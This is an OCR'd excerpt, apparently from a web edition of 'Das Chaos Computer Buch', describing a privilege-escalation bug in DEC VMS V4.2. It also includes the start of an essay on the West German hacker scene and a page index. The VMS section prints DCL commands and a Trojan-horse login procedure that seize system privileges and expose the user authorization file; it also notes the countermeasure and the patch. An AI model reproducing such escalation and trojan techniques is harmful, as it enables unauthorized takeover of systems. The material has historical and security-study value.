Das Chaos Computer Buch - Monoskop

Weitere Magazine

Empfehlungen

Info

Das Chaos Computer Buch Software wird nicht erst dann zur Benutzung freigegeben, wenn sie nachweisbar korrekt funktioniert, sondern bereits dann, wenn die Häufigkeit, mit der neue Fehler entdeckt werden, auf ein für die Geschäftsleitung akzeptables Niveau gesunken ist. Anwender müssen lernen, Fehler und deren Konsequenzen zu erwarten. Ihnen wird gerade von den Hackern häufig erklärt, wie sie bis zur Verbesserung der Software die Fehler umgehen können. Gerade das Betriebssystem VMS der VAX-Systeme von DEC setzt sich aus einfach zu verstehenden und strukturiert aufgebauten Software-Modulen zusammen. VMS gilt bei den Hackern nicht zu Unrecht als eines von der Qualität und Systemsicherheit meistgeschätztesten Betriebssysteme der Welt. Doch auch in dem so ausgeklügelten VMS werden immer wieder Bugs entdeckt, die sich als echte Sicherheitslöcher des Betriebssystems erweisen. Ziel eines auf Datenreise befindlichen VAX-Tüftlers ist bekannterweise nicht nur das Eindringen in VAXen, sondern diese auch unter Kontrolle zu bekommen. Um sich nun nach einem Eindringen in ein VAX-System die nötigen SYSTEM - Privilegien zu verschaffen, sucht der geschickte und erfahrene Hacker erst einmal nach dem aSesam öffne dich» des Betriebssystems. Erst wenn dieses gefunden ist und das Reich der Privilegien erschlossen wurde, gilt eine VAX unter Hackern als geknackt bzw. offen. Einige dieser Sesam-öffne-dich-VAX-Verfahren gingen in die Geschichte ein. Des Hackers wahre Freude ist die Vielzahl und Reichhaltigkeit dieser Verfahren, um rasch als unprivilegierter User den Status des SYSTEM-Managers einzunehmen. Die Geschichte vom Trojanischen DCL-Pferd (Digital Command Language) in VMS V4.2 bietet besonderen Anlaß zur Aufmerksamkeit. DEC bietet seit der VMS-Generation 4.X eine neue SECU- RITY-Utility an - die ACEs und ACLs (Access Control Entries/ Lists). Ein ACL bietet dem SYSTEM-Manager die Möglichkeit, auf bestimmte Objekte, wie etwa Dateien und Peripherie, nichtprivilegierten Usern Rechte zu gewähren oder eben auch zu verwehren. Seit VMS V4. 2 ist nun neu, daß ACLs auch auf LOGICALs setzbar sind. Da im Prinzip jeder User ACLs verwenden darf, stellte sich die Frage, Seite 86 Das Chaos Computer Buch ob eben diese auch auf Objekte setzbar wären, deren Berührung normalerweise SYSTEM-Privilegien erforderte. Die Softwareanalytiker bei DEC unterließen in VMS V4.2 die Prüfung auf das für eine Modifizierung der SYSTEM-Tabelle erforderliche SYSNAM-Privileg. Dieses ermöglicht nun einem nichtprivilegierten User, die SYSTEM-Tabelle mit einem ACL zu versehen, der - äquivalent mit dem SYSNAM-Privileg - sämtliche Rechte auf die SYSTEM-Tabelle gewährt. $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*- ,ACCESS=R+W+E+D+C) LNM$SYSTEM-TABLE $ SET ACL/OBJECT=LOGICAL/ACL=(ID=*- ,ACCESS=R+W+E+D+C) LNM$SYSTEM-DIRECTORY Diese beiden DCL-Zeilen bieten mit der ID=* jedem User einer 4.2er VAX die Rechte R=read, W=write, E=execute, D=delete und C=control auf die SYSTEM-Tabelle. Dieser Bug birgt weiterhin das Risiko eines Systemcrashs, falls ein Unerfahrener alle in der SY- STEM-Tabelle befindlichen LOGICALs löscht. Das SYSNAM-Privileg und somit auch dieser ACL zählen zur Gruppe der SYSTEM- Privilegien, doch dies bedeutet noch lange nicht, alle Privilegien einer VAX zu besitzen. Der Hacker bedient sich des Trojanischen Pferdes, indem er die Möglichkeit nutzt, fremde LOGICALs in die SYSTEM-Tabelle einzutragen. Jeder einloggende User durchläuft eine ihm zugewiesene Login-Prozedur. Weist man dieser Prozedur einen LOGICAL-Namen zu, so wird VMS erst dem LOGICAL folgen und nicht erst die Prozedur namens LOGIN. COM starten. Im User Authorization File (UAF) wird für jeden User diese Login-Prozedur als L_GICMD definiert. Im Grundzustand verwendet DEC besagtes LOGIN, falls im UAF bei LGICMD keine andere Prozedur definiert wurde. $ DEFINE / SYSTEM LOGIN DISK: [DIRECTORY] TROJANHORSE. COM Seite 87
Das Chaos Computer Buch Das vom LOGICAL LOGIN aufgerufene Trojanische DCL-Pferd prüft die Privilegien jedes einloggenden Users und lässt die VAX vom eigenen SYSTEM-Manager persönlich sprengen. Als DCL-Prozedur bietet sich förmlich an: $ IF F$PRIVILEGE("SETPRV").EQS. "FALSE" THEN GOTO NIX $ SET PROCESS/ PRIVILEGE= ALL $ SET PROTECTION= (W:RWED) SYS$SYSTEM:SYSUAF.DAT $ DELETE' F$LOGICAL("LOGIN") $ DEASSIGN /SYSTEM LOGIN $ NIX: $ Ca, SYS $LCGIN: LOGIN. COM Es darf nicht vergessen werden, dieses File auch für die Benutzung durch World User freizugeben. Der erste einloggende privilegierte User wird unbemerkt dem Hacker die Kontrolle über das SYSTEM anvertrauen. Der Hacker braucht nur noch mittels des UAF-Programms und eventueller Umgehung von möglichen Security-Maßnahmen seitens des SYSTEM-Managers seinem eigenen Account alle Privilegien zu geben. SYSTEM-Manager oder Hacker können natürlich ebenso durch einen ACL die Modifizierbarkeit der SYSTEM- Tabelle verhindern. $ SET ACL/ OBJECT =LOGICAL / ACL= (ID=*- ,ACCESS=R+E) LNM$SYSTEM-TABLE $ SET ACL/ OBJECT =LOGICAL / ACL= (ID =*- ,ACCESS=R+E) LNM$SYSTEM-DIRECTORY Diese Methode wurde bereits in der amerikanischen DECUS Pagewapper Anfang letzten Jahres diskutiert. DEC reagierte damals mit einem VMS-Update auf V4.3, womit dieser DCI-Bug verschwand. Vermutlich existieren am internationalen Datennetz immer noch Maschinen mit der 4.2er Betriebssystem-Version. Kaum zu glauben, dass dieser Bug nicht schon bekannt zu sein schein Seite 88 Das Chaos Computer Buch H acker – Schwarze Schafe im Wolfspelz? Die bundesdeutsche Hackerszene in der Diskussion von Matthias Lehnhardt Das geht dir doch schon lange im Kopf herum, fiel mir ein, als ich in der Zeitschrift Chip vom Februar 1988 die Kolumne «Ist der Freak out?» von Richard Kerler las: «Dem Computer-Freak gebührt ein besonderer Verdienst. Ihm ist es zu verdanken, dass sich die Computerindustrie in so kurzer Zeit so schnell entwickeln konnte. Sein Beitrag erschöpft sich nicht nur in einer für die Branche sehr wichtigen Kaufkraft, sondern dokumentiert sich auch in einem aktiven Engagement. Viele Computerfreaks haben dieser Industrie entscheidende Impulse gegeben: Nolan Bushnell (Atari), Stephen Jobs und Steve Wozniak (Apple), Bill Gates (Microsoft), George Tate (Ashton Tate), Chuck Peddle (Victor), Adam Osborne (Osborne) und viele mehr. [. . . ] ohne diese Aktivisten [hätte] wahrscheinlich die Weltwirtschaft in den letzten Jahren keinen so großen Aufschwung genommen. Aber: Die Spezies der Freaks zeichnet sich durch kurze Lebenszyklen aus. [. . . ] Computer-Freaks sind die Lemminge unseres technologischen Zeitalters. Sie haben über Jahre bravourös ihre Rolle als Trendsetter gespielt. [...1 In dem Tempo, wie sie sich in kürzester Zeit wie Meerschweinchen vermehrt Seite 89
Seite 2 und 3: Das Chaos Computer Buch 1.-23. Taus
Seite 4 und 5: Das Chaos Computer Buch Das BKA bes
Seite 6 und 7: Put another password in Bomb it out
Seite 8 und 9: Das Chaos Computer Buch ließ Oberp
Seite 10 und 11: Das Chaos Computer Buch auch der Bu
Seite 12 und 13: Das Chaos Computer Buch Technologie
Seite 14 und 15: Das Chaos Computer Buch Was blieb?
Seite 16 und 17: Das Chaos Computer Buch Welcome to
Seite 18 und 19: Das Chaos Computer Buch netze. Zuf
Seite 20 und 21: Das Chaos Computer Buch und (in uns
Seite 22 und 23: Das Chaos Computer Buch die Situati
Seite 24 und 25: Das Chaos Computer Buch abzuwickeln
Seite 26 und 27: Das Chaos Computer Buch wurde gesen
Seite 28 und 29: Das Chaos Computer Buch durch globa
Seite 30 und 31: Das Chaos Computer Buch verunsicher
Seite 32 und 33: Das Chaos Computer Buch Interesse a
Seite 34 und 35: Das Chaos Computer Buch Trojanische
Seite 36 und 37: Das Chaos Computer Buch Deutschland
Seite 38 und 39: Das Chaos Computer Buch tungsdesign
Seite 40 und 41: Das Chaos Computer Buch spezielles
Seite 42 und 43: Das Chaos Computer Buch STRIPES. EX
Seite 46 und 47: Das Chaos Computer Buch haben, dezi
Seite 48 und 49: Das Chaos Computer Buch Desktop Pub
Seite 50 und 51: Das Chaos Computer Buch nicht, auch
Seite 52 und 53: Das Chaos Computer Buch einigen Hac
Seite 54 und 55: Das Chaos Computer Buch Das Kolumbu
Seite 56 und 57: Große Strömungen Licht, Feuer, St
Seite 58 und 59: Das Chaos Computer Buch Megamaschin
Seite 60 und 61: Das Chaos Computer Buch nicht der r
Seite 62 und 63: Das Chaos Computer Buch Auf den Bil
Seite 64 und 65: Das Chaos Computer Buch den musste,
Seite 66 und 67: Das Chaos Computer Buch umzukompome
Seite 68 und 69: Das Chaos Computer Buch konventione
Seite 70 und 71: Das Chaos Computer Buch meisten vor
Seite 72 und 73: Das Chaos Computer Buch Nebenbei pe
Seite 74 und 75: Das Chaos Computer Buch tärisch um
Seite 76 und 77: Das Chaos Computer Buch Den Militä
Seite 78 und 79: Das Chaos Computer Buch Bei nähere
Seite 80 und 81: Das Chaos Computer Buch tigkeit all
Seite 82 und 83: Das Chaos Computer Buch eine extra
Seite 84 und 85: Das Chaos Computer Buch Die Hackere
Seite 86 und 87: Das Chaos Computer Buch ses neuen B
Seite 88 und 89: Das Chaos Computer Buch Denken aufz
Seite 90 und 91: Das Chaos Computer Buch manochwas,
Seite 92 und 93: Das Chaos Computer Buch «Ausspähe
Seite 94 und 95:
Das Chaos Computer Buch rechtigten)
Seite 96 und 97:
Das Chaos Computer Buch Wenn man se
Seite 98 und 99:
Das Chaos Computer Buch Kritik der
Seite 100 und 101:
Das Chaos Computer Buch und ist in
Seite 102 und 103:
Das Chaos Computer Buch Altmeister
Seite 104 und 105:
Das Chaos Computer Buch Doch was tu
Seite 106 und 107:
Das Chaos Computer Buch A m anderen
Seite 108 und 109:
Das Chaos Computer Buch zweck war,
Seite 110 und 111:
Das Chaos Computer Buch meinen Abhe
Seite 112 und 113:
. . . der Schmierer Das Chaos Compu
Seite 114 und 115:
Das Chaos Computer Buch möglichkei
Seite 116 und 117:
Das Chaos Computer Buch Seite 230 A
Seite 118 und 119:
Deutsche Hitparade Das Chaos Comput
Alle anzeigen

Das Chaos Computer Buch - Monoskop

Sie wollen auch ein ePaper? Erhöhen Sie die Reichweite Ihrer Titel.

Template löschen?

Als Template speichern?